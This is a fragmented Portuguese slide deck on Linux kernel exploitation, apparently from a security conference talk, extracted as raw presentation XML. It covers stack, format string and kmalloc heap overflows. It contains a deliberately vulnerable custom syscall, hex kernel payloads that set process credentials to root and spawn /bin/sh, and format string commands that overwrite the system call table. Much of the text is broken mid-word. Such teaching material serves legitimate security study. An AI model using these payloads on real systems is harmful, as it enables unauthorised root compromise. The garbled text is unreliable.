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836280" y="243000"/>
            <a:ext cx="1440" cy="521964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720360" y="243000"/>
            <a:ext cx="1440" cy="558000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539280" y="243000"/>
            <a:ext cx="1440" cy="594036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040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ome.bn-paf.de/sebastian.haase/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.isec.pl/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.guninski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32040" y="770040"/>
            <a:ext cx="77817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Exploitation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95560" y="6099120"/>
            <a:ext cx="76611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Glaudson Ocampos / Wendel Guglielmet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Intruders Tiger Team Sec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Times New Roman"/>
              </a:rPr>
              <a:t>http://www.intruders.org.br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19120" y="1722600"/>
            <a:ext cx="729612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9520" y="770040"/>
            <a:ext cx="73375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Descoberta e Análise de Vulnerabilid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1040" y="2654280"/>
            <a:ext cx="843120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- Esquemas para Descoberta e Análi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Análise de Código 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Fuz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Engenharia Reversa (di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9520" y="385920"/>
            <a:ext cx="73375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Descoberta e Análise de Vulnerabilid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040" y="1727280"/>
            <a:ext cx="909936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#define MAXBUFF   5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c char vbuffer[25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mlinkage int vulneravel(int len,char *cod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 buf[25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cpy(buf,code,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nprintf(vbuffer,sizeof(vbuffer)-1,bu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ntk("Output: %s\n",vbuff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mlinkage int sys_cassandra(int len, char * bu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 *code = kmalloc(MAXBUFF, GFP_KERN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y_from_user(code, buf, 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ulneravel(len,cod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6920" y="3405240"/>
            <a:ext cx="3019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[ I ] - Stack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37120" y="3770280"/>
            <a:ext cx="3324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[ II ] - Format String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72480" y="5430960"/>
            <a:ext cx="24714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[ III ] - Kmall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ap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0040" y="7300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Uso do Depurad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040" y="1782720"/>
            <a:ext cx="96663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@manhattan:~# sysctl kernel.k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rnel.kdb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@manhattan:~# sysctl kernel.kdb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rnel.kdb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@manhattan:~# cat /proc/sys/kernel/k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ing kdb (current=0xc0447ba0, pid 0) on processor 0 due to Keybo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0]kdb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1840" y="7300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Uso do Depurad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040" y="1784520"/>
            <a:ext cx="966636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0]kdb&gt;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idle process (state I) and 14 sleeping system daemon (state M)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sk Addr       Pid   Parent [*] cpu State Thread    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dffcca40        1        0  0    0   S  0xdffccc30 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c1522a60        4        1  0    0   R  0xc1522c50  events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df4a75b0      962        1  0    0   S  0xdf4a77a0  ude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df106590     1181        1  0    0   S  0xdf106780  syslo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df0e3080     1184        1  0    0   S  0xdf0e3270  klo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df4a7ac0     1269        1  0    0   S  0xdf4a7cb0  b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xdf128ac0     1270        1  0    0   S  0xdf128cb0  age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01840" y="7300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Uso do Depurad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640" y="2654280"/>
            <a:ext cx="87152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rática do Uso do Depu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80960" y="7714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8560" y="2208240"/>
            <a:ext cx="88362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Payloa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Parte do Exploit responsável por executar comandos ou tarefas desejadas por um atacant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Termo vem da comunidade de coders de vírus, onde se denomina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para o código contendo a ação que um vírus toma após ter contaminado um arquivo(definição clássic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Payload é o equivalente a shellcode em exploits criados para o user spac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8080" y="1336680"/>
            <a:ext cx="7275240" cy="555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80960" y="4460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3560" y="6951600"/>
            <a:ext cx="77421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yout de um Processo em Execução no Ker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9520" y="7714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040" y="1641600"/>
            <a:ext cx="934236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udança de UID de um Processo por L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#define TASK_ADDRESS "\x60\xda\x51\xdf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 payload[]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\xb8"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SK_ADDRESS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//      mov    PROCESS_ADDRESS,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\xc7\x80\x98\x01\x00\x00"      //      movl $0x0,0x198(%e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\x00\x00\x00\x00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\x31\xc0"                                  //      xor    %eax,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\x40"                                        //      inc    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"\xcd\x80";                                //      int    $0x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c int __init inicio(void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asm__("jmp *%0"::"a"(&amp;payload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80960" y="7714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5920" y="1803240"/>
            <a:ext cx="909936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aptura de Current Process(TASK ADDRESS) e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l $-8192, %ec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l %esp, %ec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l (%ecx), %ecx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r payload[]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* get current proces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"\x31\xf6"                               //      xor    %esi,%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"\xb8\x00\xe0\xff\xff"           //      mov    $0xffffe000,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"\x21\xe0"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 //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andl   %esp, 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"\x8b\x00"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  //     mov    (%eax),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80960" y="7714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8160" y="1844640"/>
            <a:ext cx="875520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Capturando OFFSETs(include/linux/sched.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 *par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id_t uid,euid,suid,fsui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id_t gid,egid,sgid,fsgi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9520" y="7700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Por que Aprend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2959200"/>
            <a:ext cx="79851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Capacidade de elevação de privilégios e acesso remo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175280"/>
            <a:ext cx="79851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Quebra de Sistemas de Prote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5208480"/>
            <a:ext cx="79851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Maiores Recursos Para um Atac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20840" y="4460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2560" y="6991200"/>
            <a:ext cx="806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Árvore relacional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1080" y="1417680"/>
            <a:ext cx="84312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80960" y="7714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0720"/>
            <a:ext cx="92613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/* Payload for kernel 2.6.10 with KDB  - Hardecod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har payload[]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* get current proces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31\xf6"                                               //      xor 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b8\x00\xe0\xff\xff"                           //      mov    $0xffffe000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21\xe0"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//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andl   %esp,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8b\x00"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// mov    (%ea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* capture the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8b\x80\xb0\x00\x00\x00"                 // mov    0xb0(%ea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* set uid to 0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c7\x80\x98\x01\x00\x00\x00"           // movl $0x0,0x198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00\x00\x0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c7\x80\x9b\x01\x00\x00\x00"           // movl $0x0,0x19b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00\x00\x0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c7\x80\xa0\x01\x00\x00\x00"           // movl $0x0,0x1a0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00\x00\x0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c7\x80\xa4\x01\x00\x00\x00"          // movl $0x0,0x1a4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00\x00\x0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* exit(0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31\xc0"                                              //     xorl %eax,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40"                                                     //      inc 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"\xcd\x80";                                            //      int    $0x80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01840" y="4064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2120" y="1236600"/>
            <a:ext cx="968688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ayload Local – Universal / Série 2.6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 pay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asm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"payload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xor    %eax, %eax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mov    $0xffffe000, %eax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and    %esp,%eax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pushl  %eax         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all   set_root      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pop    %eax          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cli                        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pushl $0x7b                             \n"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pop   %ds                                 \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pushl %ds                                \n"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pushl $0xc0000000                 \n"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pushl $0x246                           \n"  //E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 pushl $0x73                             \n"  //CS user se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" pushl $shellcode                    \n"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//EIP must not be a push /bin/sh shellcod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"iret                                            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03280" y="50796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Construção de Paylo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520" y="1419120"/>
            <a:ext cx="905832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nteúdo das Funções - Payload  Local – Univers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oid set_root(unsigned int *t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s = (int*)*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 cn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(cntr = 0; cntr &lt;= 512; cntr++, ts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( ts[0] == uid &amp;&amp; ts[1] == uid &amp;&amp; ts[4] == gid &amp;&amp; ts[5] == g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s[0] = ts[1] = ts[4] = ts[5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oid shellcod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("/bin/sh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8040" y="588960"/>
            <a:ext cx="8715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Stack Overflow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22600" y="1479600"/>
            <a:ext cx="6648120" cy="56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8040" y="588960"/>
            <a:ext cx="8715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Stack Overflow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560" y="1438200"/>
            <a:ext cx="857268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8040" y="588960"/>
            <a:ext cx="8715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Stack Overflow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0040" y="2878200"/>
            <a:ext cx="85327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Prática de execução de um exploit para stack over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6560" y="608040"/>
            <a:ext cx="9039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Format String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7040" y="1701720"/>
            <a:ext cx="88963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fini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mat String Bug ocorre quando dados enviados pelo usuário são interpretados como sendo format strings para/por uma função e não como valores de uma variá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nprintf(buffer,sizeof(buffer)-1,cod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intk(“Output: %s\n”,buff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 o usuário enviar uma format string(como %p) para a variável 'code', a função snprintf irá processar como se fosse tal, ocasionando um sério problema de segur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6040" y="771480"/>
            <a:ext cx="9039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Format String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8560" y="2006640"/>
            <a:ext cx="867420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Observações a Nível de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Assim como em User-Space, no Kernel Space, o mau uso de format strings pode ocasionar condições de buffer overflow e sobrescrita de ponteiros (DoS é trivi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Pure format Strings é possível, mas requer conhecimento das estruturas do kernel(Onde sobrescrever e pra onde apont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Parâmetro $ para manuseio de offset em exploits para format strings não funciona, preparar a format string para exploitação é mais trabalho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6040" y="771480"/>
            <a:ext cx="9039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Format String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" y="1782720"/>
            <a:ext cx="922176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Ataque em duas F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º Fase – Sobrescrever Ponteiro na tabela de system ca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urier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>printf "\x35\x8b\x44\xc0\x38\x8b\x44\xc0" &gt; f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urier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>echo -n "%.16781304u%hn%.12345u%hn" &gt;&gt; f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urier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>./fortest `cat fmt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ourier New"/>
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t>16781304 = 0x01001000 (- 8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º Fase – Mapear memória e executar system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map(0x01001000,120,PROT_EXEC|PROT_READ|...,-1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mset(0x01001000,0x90,1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mcpy(0x01001019,payload,sizeof(payload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kill(12345,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8080" y="770040"/>
            <a:ext cx="73371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Kernel x User Sp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9640" y="2006640"/>
            <a:ext cx="82486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- Kern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e do Sistema Operacional Responsável por Gerenciar os Recursos de Hardware dispo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- Kernel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ão de Memória onde se encontram as estruturas e dispositivos pertencentes ao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- User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ão de memória onde os programas dos usuários execut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6040" y="771480"/>
            <a:ext cx="9039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Format String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040" y="2695680"/>
            <a:ext cx="8856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rática de Exploitação Usando Format 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000" y="771480"/>
            <a:ext cx="94438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Heap Overflow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1824120"/>
            <a:ext cx="88358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Kmalloc() x malloc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Diferente de DougLea´s Malloc , os “bondary tags” se encontram em outra lista encadeada(caches free,partial,ful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Condições de buffer overflow crescem em sentido contrário a localização do cabeçalho de controle(Slab Header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É possível sobrescrever objetos e conseguir elevação de privilégio através de truques(ambiente ainda muito hosti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Em alguns casos, pode ser possível acessar o cabeçalho de controle através de falhas de Buffer Underflow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4440" y="771480"/>
            <a:ext cx="9444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Heap Overflow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6520" y="1824120"/>
            <a:ext cx="88358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Kmalloc() - exploi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Qobaiashi descreveu novo truque usando IPC(InterProcess Comunication) através de shared memory(final de setembro de 2005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Denial of Service é trivial com essa técnic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Problemas com ambiente hostil(kjornal, por exemplo)ainda dificultam exploitação simpl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- Pesquisas devem progredir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4440" y="771480"/>
            <a:ext cx="9444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Heap Overflows in Kernel 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6640" y="2289240"/>
            <a:ext cx="89982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Prática  de uso de exploit para Heap Overflow gerando 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4440" y="771480"/>
            <a:ext cx="9444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Exemplo – Case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560" y="1600200"/>
            <a:ext cx="875520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/usr/src/linux/fs/eventpoll.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Integer Overflow em Event Poll que gera Stack Over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mlinkage long sys_epoll_wait(int epfd, struct epoll_event __user *events, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en-GB" sz="5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xevents, int timeou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* The maximum number of event must be greater than z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(maxevents &lt;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turn -EINV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Bug Descoberto por George Guninsk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4440" y="771480"/>
            <a:ext cx="9444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Exemplo – Case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2080" y="2309760"/>
            <a:ext cx="83710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Exemplo de Alteração no Exploit K-rad e Exploitação Fi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9520" y="77148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Problemas Comu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1560" y="2208240"/>
            <a:ext cx="8491680" cy="36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- Payload Hardco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- Remote Explo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- Problemas com Brute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- Falhas Comple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00040" y="3254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Referênc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9160" y="1255680"/>
            <a:ext cx="903924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Trabalhos do Qobaiashi -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home.bn-paf.de/sebastian.haas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Isec Advisores -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sec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Understand the Kernel Linux – Daniel P. Bo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Desenvolvimento do Kernel do Linux – Robert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Advisores do George Guninski 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guninsk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Kernel Stack for Fun and Profit – Phrack 60 – Artig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Shellcoders Handbook – Jack Koziol, Sinan Eren e o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 Palestra(em chinês) da Xfocus -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http://www.xfocus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85640" y="1440000"/>
            <a:ext cx="89172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O primeiro passo para solucionar um problema é conhecer o problem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1080" y="4417920"/>
            <a:ext cx="849168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ker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ker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nferece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azendo você conhecer os problem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http://www.h2hc.org.b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8080" y="770040"/>
            <a:ext cx="73371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Kernel x User Sp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2560" y="1925640"/>
            <a:ext cx="81882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9520" y="7700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Kernel x User Sp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4080" y="2046240"/>
            <a:ext cx="7943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ystem Ca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6480" y="2573280"/>
            <a:ext cx="7802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face responsável por fazer a interação entre o User Space e o Kerne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437840" y="4336920"/>
          <a:ext cx="307980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37840" y="4336920"/>
                    <a:ext cx="3079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20720" y="3627360"/>
          <a:ext cx="6566040" cy="30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3627360"/>
                    <a:ext cx="6566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00120" y="6910560"/>
            <a:ext cx="6850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abela de Camadas de Execução de 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98600" y="54756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Kernel x User Sp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560" y="1519200"/>
            <a:ext cx="895824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abela de SystemCalls (unistd.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* This file contains the system call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restart_syscall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exi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for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request_ke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keyct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__NR_cassandra 2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define NR_syscalls 2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9520" y="46656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Kernel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79600" y="2046240"/>
            <a:ext cx="76611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95560" y="1317600"/>
            <a:ext cx="80247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Assim como os programas do User Space, o Kernel possui inúmeras funções internas. Algumas são “chamadas” pelo usuá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560" y="5532480"/>
            <a:ext cx="89172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300dc"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Assim como no User space, as funções do Kernel podem conter falhas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39760" y="3486240"/>
          <a:ext cx="307980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9760" y="3486240"/>
                    <a:ext cx="3079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851040" y="2471760"/>
          <a:ext cx="8269200" cy="289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2471760"/>
                    <a:ext cx="82692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9520" y="770040"/>
            <a:ext cx="73375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Kernel Exploi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2680" y="2147760"/>
            <a:ext cx="810576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 – Descoberta e Análise de Vulner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 - Criação de um Método de Expl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 – Melhoramento do Método de Expl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9520" y="770040"/>
            <a:ext cx="73375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Descoberta e Análise de Vulnerabilid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2680" y="2593800"/>
            <a:ext cx="81057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- Classes de Vulnerabilida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+ Stack Over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+ Format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+ Heap Over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+ Outras (Race Conditions, Bad Memory Management, VM Problems, Deadlock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